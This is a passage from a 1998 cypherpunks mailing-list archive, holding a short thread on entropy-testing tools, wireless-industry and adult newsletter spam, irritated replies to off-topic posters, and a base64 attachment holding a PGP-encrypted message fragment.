remove in the subject line.  This is a one time offer and you 
should not hear from us again!

TCPS,Inc., 4718 18th Ave., Suite 135, Brooklyn, NY 11204

Office [718] 287-3800  Fax [718] 462-5920 24 hours
[9am to 10pm NY Time]

[c] Copyright 1998 TCPS, Inc. All Rights Reserved.































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@m7.sprynet.com>
Date: Thu, 30 Jul 1998 11:23:46 -0700 (PDT)
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: encrypted FM radio hiss
In-Reply-To: <3.0.5.32.19980727110437.007b8100@m7.sprynet.com>
Message-ID: <3.0.5.32.19980730093354.007bc4d0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:11 PM 7/30/98 +0100, Mok-Kong Shen wrote:
>David Honig wrote:
>
>> I don't believe the depth of info you want is in Marsaglia's distribution
>> notes.
>> You want to talk to a real statistician...
>
>It may be of some interest for you to know that the designer of
>Diehard has the rather uncommon habit of never answering mails with 
>questions on his package. A bug report of mine was without answer. 
>Later I learned that others have had the same experience.
>
>M. K. Shen

Hmm.  What packages or tests do any experimentalists out there use 
for entropy measurements?  

I've used Diehard.  Also I look at compressability (gzip).  I've found
spectrogramming utilities.  I think Walker has a utility, not yet looked at.




honig@alum.mit.edu

   "Speech is not protected simply because it is written in a language"	
	Federal Misjudge Gwin on the Bernstein Case









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 30 Jul 1998 13:35:06 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 30, 1998
Message-ID: <199807301716.MAA24997@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 30 Jul 1998 05:11:58 -0700 (PDT)
To: David Honig <honig@m7.sprynet.com>
Subject: Re: encrypted FM radio hiss
In-Reply-To: <3.0.5.32.19980727110437.007b8100@m7.sprynet.com>
Message-ID: <35C06305.DE28A900@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


David Honig wrote:

> I don't believe the depth of info you want is in Marsaglia's distribution
> notes.
> You want to talk to a real statistician...

It may be of some interest for you to know that the designer of
Diehard has the rather uncommon habit of never answering mails with 
questions on his package. A bug report of mine was without answer. 
Later I learned that others have had the same experience.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Thu, 30 Jul 1998 10:14:09 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: In and out brothel/My wife lays eggs like a chicken
Message-ID: <19980730151300.21245.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/30/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Thu, 30 Jul 1998 17:51:37 -0700 (PDT)
To: CLCTCHR@aol.com
Subject: Re: MORE!!!!
In-Reply-To: <407bc87c.35bfc6d9@aol.com>
Message-ID: <3.0.5.32.19980731003949.008bfc60@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 PM 29 07 98 EDT, CLCTCHR@aol.com wrote:
>More!
>

More What?

Stupidity?

Idiocy?

Spam?

Irrelevant posts with meaningless contextless drivelous foulness?

GO THE FUCK AWAY, ALL AOL'ers.
This list is not about 3l33tnEZZ, or being *K3WL*.

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Thu, 30 Jul 1998 17:51:38 -0700 (PDT)
To: Babybee390@aol.com
Subject: Re: vinyl stickers
In-Reply-To: <57a0eea8.35bfcae7@aol.com>
Message-ID: <3.0.5.32.19980731005235.008bfc60@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 09:22 PM 29 07 98 EDT, Babybee390@aol.com wrote:
>do you have music vinyl stickers , if so , could i get them wholesale?
>

This is not the first sticker request to be sent to the CypherPunks list.
Could you please tell us, where did you here about CypherPunks, and what
made you think we could help you with your sticker request?

This is only so we can serve you better,,,,,

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Fri, 31 Jul 1998 07:31:41 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Better living through masterbation/Digestible Dildos
Message-ID: <19980731081100.3170.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/31/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: toto@fhouse.org
Date: Fri, 31 Jul 1998 07:59:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SECRET.AS7
Message-ID: <TCPSMTP.18.7.31.8.47.8.2847582152.1142187@fhouse.org>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3994.1071713793.multipart/mixed"

--Boundary..3994.1071713793.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 
SECRET.AS7


--Boundary..3994.1071713793.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: ""

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRSwgUEFSVCAwNy8wNy0tLS0tDQoNClVj
L082VHNiYWtyRGtNTjAyNlZJTkE1azQ5U05PZEV2OUl5cnVBZzg3cUdPb0g5
TEdhM2w0S1lERWpPZE51RS8NClVSa1Iwd2FEOWY1bG5KQmRDbDkrbmQyRmxS
blBncnFoZFd3RW1UL2o4MEhmUGc0VTZ4cTBlYmppMXFCTlNKbWINCnE5cGp2
Qll0UlZXekYzYUV0TElkTk5KUE5WS2tXVCs1SHdCUFBxN1AyckdlT055K2sr
cnhZOVd0QUFjcCtmT3INCkVZTC9vdnlEcG9mc3p6dUNNdkx2dmN5Z25yTmpO
TUVhRk5pdk83M0VNQWtQYmNvQXFXZGVGd1BzYUo1M05qUk0NCmpNVVo4YWZh
amxEYldhWWxkM3Y0dWlaN1F3ZGZVZ2IwU2I1S2JmckpXWDlyNzhiNmRsbGVt
WU1qeDV1T1c5dnINCjkzUDQwWnB3dldaRnJsRlA0Ni9qQld0RWViT2xSUm1X
dmExdWI4M1JxNUdURlFmUDhVbUJLYWJIMWRNcWxubVMNCjVtRm5KUkF4dTdP
QVhEdCtRQkJqUE1KaXBtTW5xOVo1U1pRcXpmVFY2M1ZobjV2cHVlUnUySldF
QXFMR2VkQTINCjFKMlNiTEQwa3BlRitZTHNlVG92QkdQeEVQZ1J0NlhJeFRi
WWlZd0xueWJRd1o5SW4wVGVMVGVvYkRsVHU2MGcNCks4UHU3WTJxOHVBak1D
cTIxT2RJRUhqVThZa0FTbElaM29ySWs2VVllT0o1dk5vYkllRERjbzRJeDJv
dFhxdXgNCjNmM2tTMU5wMTg2S0FPV1hDT2JuSURjQndDazZiU1M2cmZTbHRT
S1UvUWhwd1RaTEo5Szg2dm5SRkU5OUNkNFcNCm5tbzVPMFRlZlZEUE1NNmZq
ZElhWDVlOWI1VUMxbUlwRjhjeUR3Q2ltRk90UzVVQXhacGFpckRHOHJjdVRW
UzcNCkVRWktIb01Bdkkxck9tQms3ekhNNllib3ZvajRZdW5LRUxreWRvbTZW
RTZzdTZlWjh3MWhPRGM0VXVEZ2JENE0NCm92NGoweWlLRE0vMmRGY3ZSWG1u
SlZXVkxFK0NQRUJ1cUxhUVFqSHJBU3JqaWtWYjRXSHVSSlV2T2UyTldISk4N
CnYyak9RMWNXWkF2bzBtM202clliODdPSEZGQ0dWTkhsSStaRUdIekM4OHN0
Rm80S2drcVBROUJkNnZqaHp2YWcNCkgyV055Y2RQWDBCd2ZIUEZIYVF2VHFG
NkpyNjErN3pkOVdWSTVYNkhheDVNWFZEaEo0MDR1cXhJWWJHYkZwbkkNCmsx
S08xazBvaFNLVTh6TUJ1Q2phSmcyYnBMREswTEg2S2ZhZTZKemlKSmE0VWZP
T1R0amNQRm9mbHQrMlV0SlkNCmg1UUZiYkh6cVZ3UmduNzdBMytRSVg2Y21I
RVVuU2VEWXpQdkZFSE5hV05yUVFKWmwxaEY5eERxRnllRlBLVHMNCnA0SWg0
bHlPMUdsRVh0bnkrNlBCbHM2c1pRUmcrRnhHcEZveTAzYjBqR2tqczBMdXhO
MWFyQnZWcDNrTUhoL2YNCkJjL3VTTVh5MVE2anovbFZwOTBUUW41TGtMaWo5
dnQ5eVF3aE11b2p3aVh4bXVwZ1F0UFllRnVGSzExZDFkTTgNCkVidHVoN1pr
ajAwTkgrbFVMSDYrcHZrMFJOQzRTNzRFYnp4bCt5ajJCNVprR2Q2SXQxQkdB
UkNGRkRvUGxIN2QNCjNzWDhlYTI3dVM1anhrKzlGcXVLeE1mN0hmVnhqdTRm
Z3YwZXNqZVM5QUxDMTBBeDh2TE9ZS2NCSUxwZThrR3MNCm1iZ1lTT3AvbFZi
a0VxZVJvejVyUFFldU40enltVWk5SXVHV0NHalVvZUpicVVmZW4rM2RMN2tK
RFBLUk54cFUNCnI5YkVmUzJGK0lmVmcyT3B2Vk5XczRjbEJsVzlZM0pINlUx
L3NUMlFPUWdyNVFzSlZiUm9FQTlvZ2xpNUhVNFQNClRNcS9IbGxQVVZGMnc0
VkVKZVM2Uy9TYWxmUmZINUJETXFsdll3Skl4b3drZVQrZW5ETDlVeURCRVpD
K3pQKzkNCkQ4czVFTzlQLzVpejIrSWppcWxqdjJlaHVjbHpQT1FZRVR1czlz
bEZWd005VG5zUFVWYm1UV2R3bFp4eGtrWmINCjU1NmJqMkxjcXdQRyszdHBO
Y0xCd1BWTHkwZUgzQ2xOWXVYa3ZxQ1Y5ejZyenFJVTFHbjluV2ZWWnVaK0NF
ejcNCm1tOWR4bjA2bFowYzhWcnVCc0ZXMEZVcmpQY2c3cmN0eGJibisydFM5
VVhsSjY2U29SSjdNMExqS1BwVFdJNVQNClVrMm9qMHBoUEFnTHN3aHNiVVBu
WUo3S1RTd0tGMXVLZ3VCcVBnSWlFa1NhZGhHSFJhUTI1SjlkdE5aaXowVzIN
CmYvRktDbWt5NU1waUdIR3UrZzNDK1Z0enk1T0lZT0VKUG4raVhvZDY2aWg5
UU9WZWQxbks5aThkaDVyb3p1NUYNCkZpY1FYcGE4aSt0V3YrQXpkK1A5SUZx
STFkS3luT1ExZ0gvZ1RWVEppSlZRZWFoVHBoWUNScGkwTGRQbXhOalANCks0
OHF5YURycm4xRUl1MGhtK1FtVXUzdDNMdWdmZURoa3RuQ3FhOGVLOGZyKzVi
Uy8wdytVMDNUcy9lUW4rc1INCkZyVERkaGhxd01INGlXOW5rVU1ac240dThS
SXhQRHNHYnJHcW5hOWN0Q2J2SkdIMWZHT1Z3bWJvR3ZESXpGQUYNCnRXSCt3
eXN6VUtqd0dwZ1kzYXBQSHVyc3JVNkxCQ00wcjFkOGxDVmtWaWhxWXVpUklY
emJJUC9RSjhIb1NoVHUNCmR0ME5PTi9iYThkWE9oTHdKOVVLWm00UnN0MDZV
bnEyWktXbjN4VmFjU04rbDFyakp0WFZPdGlpYzFVWCtsZW0NCkJBWUR1ZHNz
QjhQRDU2TkJPSHF6Z0ZoRWFwUlU3T096cEczREZxYnhOTjgyMlBjUml2Q2N3
UGx1ZTRwQmp3eVANCjJudDFIRlorK2U5RVpxMWxCLzVsQXhWdndIbmZsYUVJ
dGErU1M5ZWVhRzUyNXRDaWhibXN3anV5ME5oanE3N1YNCmh1OVJ4OU5FV0Q3
aGxJK2dMeHJlUC83b1BKTjdpZHkrZmVWNHlWcG5jQkQ5L1A5UWFkdVc3Yzk1
TExxUlNCZCsNCk1ZQnlnL09SNWM2SE8yeEUwWXR2bk1ZK3pGQktyQ21lTWZU
c21UR2REZnRqajZrMTMycWlEZlJ4UGJqdHVSdFANCi82ZDA2TU5GS29SNWNx
T1EwQXlEeDNWSWlUTnN4R2FVTmRnTVZTajVxQWdzNUthc0ZrZkgzdDhZY1Zu
V2xsM2YNCnNZMFpvbVF3dkdZeFZidmprSUI3eVlTaEZ5Vm54YXZzYXdIQ3d5
RWZGWEVMdGVzT2svRmxLQnpXckw3ZXM2MDUNCkNEYjEvU2pNWS8xZmVqTkIx
WmVSd0xPaGNQem01U2pzTzUwRzdsd1NHUjhsNlIyRGw5RHI1ak0raFNMNjJj
ZzgNCnpKSjNWclA4SVp5RVM1ckJsVFVuNWZCRXFCNXVXZ1hmanJocVd6cTI5
Uml5TmgwN1h4S3hnamhzRW8wNGtuOU8NCm03WkgzbzFCUHdRSHl6L3oyTkhx
TzUxQ3E2Z3JFWEt1MFRhdDNzRjhOYnVqSUViandxblpscnpyZVFML0E2TEcN
ClVPaWJxcy91bVlhWmdzV3JJeEtCNFdQcW5vbCtvZUNUSGwrYlVHelR6ajJL
Mng5RHBDcjFSZDlHQjY4eTllWnQNCm9LcmNrazhYK1hPQWdLTWpnQTNZOWE2
ZmRPTGFTSkQvRzBCZXBFOEV6SnVJcFp0SUdKeFhnQ3hucWs3NFFrZGQNCkpC
WEJtNU52T1FhSzVYVW9yM3ZMa2N6ZEhhbTNMUWQ2NGZvTnFJMHRVU1p6MW9N
ZHBoRnJYaFhabEpHbnNpMWkNCjdlQk5QcWdRbXVGa3pGQjZySFlnSmpmdmxq
dWpnTWhjNmdiemUvNmt5OUFnd1RjY2hhZlEyQWczeUI2ZkRzdHINCkZZVUtV
ZGc2UTBETlFnTkJDZGplbFRVem4wZ0pKblRjMzIvT3NpN0NVM1RYaXF6VWM4
eDhXTUdPMTRpTk5GYmgNClowd1Rxak9RaFdFWCtMQTJEWi93eGhMeFpzUUxK
dUdYRDFjMWs2cHhTRFlyNEVRc2l2aVhBZ1ZBTGxtVGoxbi8NCklybGJNcHJI
MTdPRHhNa0QzL2p4UStWcWlHbzlabHVHOW9lS0hRdFM2MjRQZnJHTDh3TS9k
RDJEZEEwY2cvQnENCm9QSytIdTBuYjFBaW1obHdJU01xUUxYUjdUcUVHN1la
WExvWjQ0TUJhUm9HUG5ZdHNuU2E0YlVjVWsxWVpxaHgNCktlV1ZxUFhkU1o1
RlQycWFINURLT0RobElsUGV5RUxTVzBSRmV0K09CRXN5Z1dES3ZNbTg3Rnk0
RStITkVuR2MNCnNNdDlKQ05jRDljN2wrRUFWdVNRSTZmdTZIaHZPRS9lZUlr
VFpsT1djZmJXa1ZLYnBjTDBVdm1vUng1NXV5eTINCktRQ2dkYXRHZ2xDOE95
VmFYbjMwdzdERmo0azZkSlJBVlB6ZVlGQUJ1SmVHM0hvd0hSd1l1TWlsdEZI
bHV3RVMNCjcwSVl4K1laSkVaS2hmUXhZRnVoYzBoMjN5Q29KM0JLLy95bWxv
azdQcnNGc2Z1SEowRFlPbFF3QlNrVmtwOFYNClIyWWJscGk1UTBQV1NxWFF3
dzcvdTg3OW4yV3NRMng5ZCtnNFVvOXFIZGlFbEZPeWgrOWl2WmNyTGJMelhZ
OWUNCkgrRWNrK2w4SG1pc3pJSHFGNWNjOXA3Z1JIUjZoeU9PaFRUN3ZhOFFi
Y3F2S3ppQm0xS0c2VE1CMml0MWZKbjMNCkFYTkw4TUd4REVHRFpMbjNtMVpw
aUxpQThWalhuL1dad1JGcGJTTXlVWnlVUGxNRCtvUkdLK0NGejZUajJmVk8N
Cm9mWjlNZDBDYXBTR1JNZkQ0VXA4WmlIQ2FRRWdLaHU1dWZJTFFlSXpCMExP
ZVNGMnplSmVKbjF3dkQvWEtmTXMNClZvVmc5Z2ZVQU0vUTAxLytlQjV3WEhF
dVNIU1J3UjY4Y3NMRXhWVlp4U2szQVVweXRoVTFtRkJwRStyYXR2RmcNCmlH
aWZESnNMaDRRTW81dEgxbEk2RjdjcVBxMVpZOWRMbU5vd1l2eHgwVGJGNElF
VEFBOEdRaUdDNkVJK2hOeGsNCnZmOVJ5WCtwT1VoTlM2VVN2LzJlK3lYai9Y
QWJ4Y1E1a1dEVXFkMmtPRjJlWG10M0xOVFdjeE1Od0VEeVZJSkoNCmhSTFhi
czRsQi9VWnUzN1lFQTZvZFprL2RUbDkrUWRmWVV0VWh6bVF2RUZHd2VsR2Zw
VklXVUtKT2JmR2dCbjENCjQxd3JtcUJJZnU5c0RLSG52TmRGWkFWMmdCUkI4
U1NOUGhtT0g4WWE3MHV5bEdJQnR5RXVDb3VYang2aFZkU3cNCmlNWnozNkhn
OEdxdmJVSytoUzI1L3dMRWRlY1MrNEpoYUhjNUJqQ0dzbGFHWHRVUEpGZlEw
Umt0VENKaUxEb3ENCmZFOFNYdDc2QkFObFIvUlVuaEJjKzhOTm5qYkhGcFQ4
QlRDNmdFYjFkdzQwUXRrWHlFL1M2MUw5MUJGSW1hbkQNCnNhMG5ZblQzc21o
bENydDRqdFlRdzB6Q2lwNFhYVVpCNXluVjZuSmxDaDVkcmhGaFltY3JQSkI4
ejRMTmp6RHUNCi9TUTY3ZGhoQnh2WEg1TmZCVndtbW1IaTNGZS9xT1RnMlll
WUsrS3hLYkNpR0VwMmJVaHh4M3RTbmZMN2t4alYNCkhlZnJxcE1CazB1WC9E
VVdleml3My9Ha2s4WC90WVNWaXdXUkhHYUZtUlB0anBGT2ZTblRXWVBZRDhI
WXBNaDUNClE0TlZxSlMzY3RMV21FbWdCRk52ZFpvdGpXV09MN1Z3M0FERHE3
aVJ6OFlpMVp2TTBReUx0NW5GaXF0L24waXgNCnNrUmo4R2sreTJKaUloVFB6
UGhzR25oRGc5Qldqek0vajRMTGdxdW9sdkVsWGFzOXp5NjFCSEJnVHpidmJW
cWkNCmxKWllPK0ttbGVEZ2NoV1ZIaVVsZ0pkZG4rRUF5VFRyaVg3MzR5VG9L
QU9DMk16VnRDaTN2ME5lamF4T2tKM1MNClNCTXV2NWNTUEhKZm00bjR5RDli
T3Y5eWhSVHR0U0YxNTBtbEpsMnZtR2hQcFZWVWlUcVJUMXNTTkdtLyszYXIN
CjZpSUY2Q2hGRktaYm5KU25zY25OenlHTnVpRXpXcWZGbUZGbWpCMzcvclFP
R0NEWTZwQ2VWcmtjOHpvdTkzaG4NCldaS1A5K2c2STJkRVZ2MDNZeGJ4c2N0
Y1JSeEFva3lvWDJjcjRJeG56YjhJek9kb2o4elBiMHVoQ2JuQ2hjaHgNCnh0
VGE3Tm81M2R4QzM1T21xOXowZy9ISTUzdXdzWUdIOUQ3ZzFJdTBBbEVtTFh1
dnFVTGp3MTltMklER2Fic2QNCm5nRmNZZzJPM05ZcW9IRS9QM3E5ek5CQ3pQ
OEY2UVllTVBZWVpia3lhVmRUcVk1NUZPWlMyY1hTalROaUlMZHYNCmMvSW1j
UlVlbnlocDRiRHFXRVp0UTJsbm85UlJRclpKaDhpQlRodW9tNmJhMEJqVDlY
RERyNE5Ud2Q5RWN6QjcNCmtnU2tEWGZtQWVWZjZFT0V3WkkwVFJEemlqQVVS
RnpjdjBFOGFMcHhvWGZtV21XalhGYkdhWUpZUkFTM082MVoNClEvVE9jekRK
WkdPRnFNSjhFd1lFUzYvcEE3dWIvVzJtWkRkQ3pGczJsRm1TYjJISUZDc3pi
dmJvalcvTjU2MEcNClZNeTUxMHZIa3RZaFlQZ2xzY3hLWkFQSFQxdU1lSld2
YjFiQjArbTlmQzc3eEFoSGYyQkovWlZRbUdpWkljTlANCkRjMWl1ZjhLV1Bm
cVRCMk1SYlVaYnNLZjBuT0tKWUowTWNFVkswQ3lUUlA4Y1RBL29SRzg3WjIw
Nk9KY1pTUXoNCk5WQWRvYWFGeUJEZXlyZ3FVKzdHa1U3ZjM3TzFOVFJhWUdj
MVF6QmQwKzl1QjNCLzI5TDZUTjdvVFVFbWs3dGsNCm1lYkpzbmE3dnRFaXlm
UU53S1BUL2NDOC91K2I4UURzWEpZSnJIZFJKSC9aZk1TaVhMZzNSWC9sMFl3
Qm0vV2gNCms3T1FnR1AxcEE5emNmZ2Naem9Xai9mWlc2Y1lFeWkxM2JFZUNB
L2lOT1hYTlRrNXJzQ04rWW5JNUJyaWhHSSsNCmxoVk9KaHpkTTNDdGNTRk1Q
VU1iRmlDNVNqOWVpV2pRUFVPNXd1VTJNaWNNN21kYlpuem9zMWpCV2RxcDFI
Ym0NClVmR2drMXdjUzBucDZ5ZUlvVmZZaGdBMFBLYkhzNHN4Q2YweHU4K0Rs
SnlUbG1rdUZXZndOcVNRc3hMYUFmWXcNCnkzZStPZWFjRjdSejlJclpWdFU4
NU9XYkkyL0RQbnFyMm5TUmtrTlBRVmdGWjNyZWhaT2c2RndEQXZseElHVnUN
Cm8xYUhzZnVZa3F4dE5nWHRYUzRSZThEa2M0aTVnR3R6ZGhLbXBnaXZmdkd6
aThra0RDcXRaNE52cDVhdkVhUWoNCm9jZk1ENnEyajhyNE1OcXg5aEhzUjJz
dUpuZHNGV3JLZmlXL3E5QTNYaFl4dGUyUWFIcUtEbU83SGdaY3ZnNW8NCnIr
T3NDTC9jaC9kNFd4d29ibTVtWEZ1WVNEUlUxaFpyTStra01xL0k4SnlleXlD
MkFJeFI3bTEwWUJoRUNUWW0NCkpMTDFmdTZFd1lVL09uaHBVUUYyUlg5RDBV
clMvcStNOWgyY3dtNFd0TEJwRXBzbVc0ZXhrcXdERC9IbmNMN3INCk5POEV2
NDllQWU1MTAxK0FrY0ZZbzdTRTNXSWNZamw3QUNWcVE3MjQrazgvaU1oem1m
LzRpNElBNlBUeXZPQU8NCm53Qmk0NjJZZkxQNFFlaWJ4NHJFV2dRTG1oVXdV
WEtHVlA2azZpTG5QZUl6TVRiRk1zSzRoOUoxVHEzWHU2U0YNCjQ2M3lrMUJH
RTRtN3BhUTYyRk5CWmdKS3JYZS92cUd2U2FPekFOOUo4VU81YktvbEFVbjlS
NHU4R1N1bHdWRXINCmV2R0NFelNHWWxhMC9BZGxiSVJLUnJPb2JpRmlWZ1g5
aXRBalRBbkQ3QmloSlkvWEJqL1k1bkNhWW9TMmcyMzMNCi9TazN5clM2MzRv
RDhEUW9iNFJUOWpJWW5QT0drbC9BaHNBWEhwU0pQT0ZPZTZINE5TWXcrL2tJ
QmxaYWFaaXcNCjB5RWJ1blZYSHpNNGxLSHNQdDNYcStRcnllWkFzZ0hTVW52
ZGJsK1pFMStrSHAyOWFMUW9DU3RNNUpYTmhtWTENCkYraGNXOVFCNW05VVI3
ZC94NUloZ3BQWHllWnRTZisxRDQ2dCthek9ialE0cklLVWpEaFJianJDNk5G
YzFDSHQNCjZSa3pyc0dvdFhzQlRUTW1IS3MyM2tScW5QcjB0QXc5Q0REVUZC
ZVZWU0M0bmZhdHpnYlJDSHZ4REtxVlV1VDgNClRPT2RDY3ZGOHVsd2dNSUxi
WEdWUTk3RUVUSDIwWWFld1NxSVJLdUtGNU1XeU1iUEtRUVd2TWhSdDRQZjZC
NEwNCk5jLzJkSmxpK2dlbTJMZTJZNnJCcHN4UmZUcnBIazI1UU1lMXlON1hk
eHZRNC8wbGpZaG55alNWZHpFbVFwOUsNCnNjdTBlNnJ4dlpodFpwSHB4TFdJ
bWVkYmFsYjRiY2gzSXdKTkJLWXZjc0R5T1ZSK3VKUFN0QnlIN1dHdmVsbm0N
Ck0yUDRVb0tQbDdwcnFMQjJXUVcrN3FjYUQwVHFsbnRONllmeGZjMWxoblli
KzJENUpSdHUySzdKdlBXWnlUc3YNCkkzVFgvNjdMK25MQzBMVkREODduVFNw
VlV4bXJZeWtYeTRURXI5dkVYbCtJY05pQnpNSDhXa0RTckFTWW80Z0cNClVE
VUdhNXJEbEloTGQyc2cyYitBSU9WdXJURjQ3UC9obnZGeXZNbHRGSGljcExq
UWc5UExadEczcmQ1cHR4WnQNCjl0RlhnMFdmV0VOWTlUT1lhdnZ3ZG85cGY1
M0psWnhVb0R4YUdGZjVFZ2RXT3BpVEtDMW0venU2T05sc1ZhQmkNCk56SmVk
WnhGY2tWSVBRYXRUOGZIZElvaHArRmlGWEFRWkFndnJlYkxuM0MrZnEvZDRJ
OUg3bS9xSVpKLzhRQm8NCmx2bU80dHZKZzc4UFlidVA5MVBWckY1UFUvaXFl
M29vajQ1Wjk1YmZvb014VXgwM1F1RVhaY2ZLU3NoSVp6d24NClVDTWR2UXpj
L0t3SDRFa004N2RnQWlhMytpaTd6S2FHSWtmS05KaWcxNjh6aTdiRkREOGMz
RjRyTDJGd2pUSTANCmMzMHF4QXRBWDBlRTZPY1hZMnNmVkZVTEhNNFF2ODJs
UDFoSHFnNG1BTlRqL1ZpNktHRmZEWEhuT25Sdm9hRFMNCnVhTDJEb1R0L3lQ
eDhWOEljWjBPUjNhNFZHdTJzeVVwR0lxTGM3UzhyMTBSRzl2YzBCRUh5VjJW
bUptZHZlSXQNCnVPa1k0aURiZzFSTzFuNlBtZkt1dHJqd1Zyd1c3aGIxRkda
L01hblYzMHF2Q0FwSjd1cm5aNy8xQXR2NmQzTncNCmlTVmVGSEFUZERrR3R0
enlPK3ltNEt4YUJ2UnZvVWtiVHJwU3pSS0VHN0s0YlBRTmpRK1cxYmZETWFW
Q2ZpMjUNCnNrZVNSWmovMXhDN1V2RmVPYnpxWWxrR3VwS2ozc1NYdTducXR5
bTUrcUEvK0Uycy85WndkbnpwRlBTY1BTN2QNCnJyc0dTaWJ0TTdzbEVTV1hO
M2NkOStTaXQxUXpKdzFNbWxvS1J5NlFtcFJ1SWJoZVJ2UlFYc0hjTm1WNzR3
WXkNCkNVdE9FQXNkTDhVczhod2tHSHVWcUROOVMrWkM0T0FHSFVTUGdwN2tH
eWpwbnkwK3M1bGZkVGowc1QyOTl6YjUNCkhWaWhDdmRVd01sODd5N0JiQkdG
MjZsZjlhcUpRSjBXL3VUU0lqNFN0cmhXbW5Menp1ODZzeHdleHdOM0VtZjcN
ClRXT05UbEtsN2F1d3dINEFUVDhtYU1mTHNjNkNCeGovSkppMmFsbVd6Y0tX
L1UySlNRam1GWkY5aXlqT0Q0ajYNCnUvRHRKUWRGMFlRVHhmVDhVcG1kRW1M
SzN6bUdET0hvL0V1aVNxb1cvNUdLVVZDb3ZRR3UvSEU0Zy9aSU5HQXYNClVa
YXg1Njc0YWNXRTFBRjdJNGFlZW9TckpsQmFiWkFaVEtlSllBTjRkT2JSSGZi
ZExCNlRLNHlaRjM3T2xYTEcNCkEzeDBFNGRRL0g4cjIxdThRMWQ4aDdGUWhl
c2ZmZ1Y2c01zLzEza3VGdzVBMnlMaERjajIrM01oSzBoZFpVeUwNCkN5NE1y
RGROcWpDYkRPbUZWWGl2NC9OQ2xSdXNzOElmVHRqM1hTcHlwQmhmK2k2aFIz
RU1lV0p2WG0wNTZKbkINCmpFU0JJdmF4NjF5OWZZZUxzOXdteEtBM280TGk4
RGx2c2cvL3lRbXpGNjN2OUUvbFR4U1VGaW1uVERzajZiemQNCnRYcFhLbWJY
Tjl2ZHB2MlUxMnRvcko5RGpZeEdTemRBV0Q4OVZPSm5HM3BlazVLNVNjOXB1
UDVLM3E1TTBhZ1UNCkI3YlF2cTZpNmpaRk1LWDl3YTNqUkpWYmkvbjdIcWhR
NmJ3cEdxQ1pGb3JxMFVQdW81aUV3RkR3UlYxbWJaTFoNClc4MXJ5ZlBCT2V0
anBWQ0hPZGJIV2ltRzNQV2pERzZiK0NFSHVxaVpZTnhzRTZmK29jeTRWdW9V
aU93bkQ5SW0NCi9xV01MT0ZGYXUxUU5sYzZSMFpoMitpMXUrOE4zTStaclBR
Ulp4RkdTVG9XWitBTlAvNXBsUldSbVdrUFdZa3UNCld1WnUzSlJNbHNPanZh
aDJDa1U1R3hMdEl5dk5vSnozY1VzV1lyOTdUR2k4dGJURXZKc2h5c3BwNzNy
cXFIZysNCkJPcC8zN2xjcmphZ2hTV2I3V2JpeGh2NHA2d0hEcHl1WDRwM0JP
MzNDYytCRHhqaVZGbzZsTVk2b3hPaURxVUQNCm5kWElSV3NWTVpIWkFGTkR0
SEN1a0ZFcjFaVi9sS1BlZHNJYlZoSWw2VXVEN2YvbURwNkEzK0U2bmNjM1B2
bFcNCjVZWTFhQStjY1JNMlBuZlBrY2l4ellTbUMvaWZNcEdDWXdZYzcxcHFH
dllqTHFnRkRBVHhjL2xIblYzY21neUYNCmhmbm5UMzR5NDZQODJ4UTBoMUpU
